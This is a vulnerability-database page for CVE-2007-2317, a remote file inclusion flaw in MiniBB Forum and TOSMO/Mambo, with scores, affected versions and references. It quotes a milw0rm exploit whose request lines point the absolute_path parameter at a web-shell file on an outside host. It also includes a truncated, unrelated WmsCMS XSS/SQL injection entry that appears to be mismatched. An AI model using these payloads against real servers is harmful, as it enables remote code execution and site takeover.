CVE-2007-2317
published 2007-04-26CVE-2007-2317: Multiple PHP remote file inclusion vulnerabilities in MiniBB Forum 1.5a and earlier, as used by TOSMO/Mambo 4.0.12 and probably other products, allow remote…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
8.03%
94.1th percentile
Multiple PHP remote file inclusion vulnerabilities in MiniBB Forum 1.5a and earlier, as used by TOSMO/Mambo 4.0.12 and probably other products, allow remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter to bb_plugins.php in (1) components/minibb/ or (2) components/com_minibb, or (3) configuration.php. NOTE: the com_minibb.php vector is already covered by CVE-2006-3690.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| minibb | minibb | <= 1.5a | — |
| tosmo_mambo | tosmo_mambo | <= 4.0.12 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WmsCMS - Cross-Site Scripting / SQL Injection
exploitdb·2010-06-06
CVE-2010-2317 WmsCMS - Cross-Site Scripting / SQL Injection
WmsCMS - Cross-Site Scripting / SQL Injection
---
# Title: XSS, SQL injection vulnerability in WmsCMS
# EDB-ID:
# CVE: ()
# OSVDB-ID: ()
# Author: Ariko-Security
# Published: 2010-06-05
============ { Ariko-Security - Advisory #1/6/2010 } =============
XSS, SQL injection vulnerability in WMSCMS
2007 Secunia Advisory SA25583 (only XSS 3 params)
Vendor's Description of Software:
# http://www.wmsdesign.net
Demo
# http://wmscms.com
Dork:
# n/a
Application Info:
# Name: WMSCMS
# ALL versions
Vulnerability Info:
# Type: XSS
# Type: SQL injection Vulnerability
Fix:
# N/A
Time Table:
# 10/05/2010 - Vendor notified.
Input passed via the "search","sbr","pid","sbl","FilePath" parameters to default.asp is not properly
sanitised before being used in a SQL query.
Input passed via the "sb
Exploit-DB
TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion
exploitdb·2007-04-11
CVE-2007-2317 TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion
TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion
---
Tosmo Mambo
/components/minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
File : configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
include_once("$absolute_path/version.php");
/configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
#Long Life Palestine
#www.Hack-Teach.com
# milw0rm.com [2007-04-11]
No writeups or analysis indexed.
http://osvdb.org/35761http://osvdb.org/35762http://www.attrition.org/pipermail/vim/2007-April/001518.htmlhttp://www.securityfocus.com/bid/23416http://www.vupen.com/english/advisories/2007/1354https://exchange.xforce.ibmcloud.com/vulnerabilities/33578https://www.exploit-db.com/exploits/3707http://osvdb.org/35761http://osvdb.org/35762http://www.attrition.org/pipermail/vim/2007-April/001518.htmlhttp://www.securityfocus.com/bid/23416http://www.vupen.com/english/advisories/2007/1354https://exchange.xforce.ibmcloud.com/vulnerabilities/33578https://www.exploit-db.com/exploits/3707
2007-04-26
Published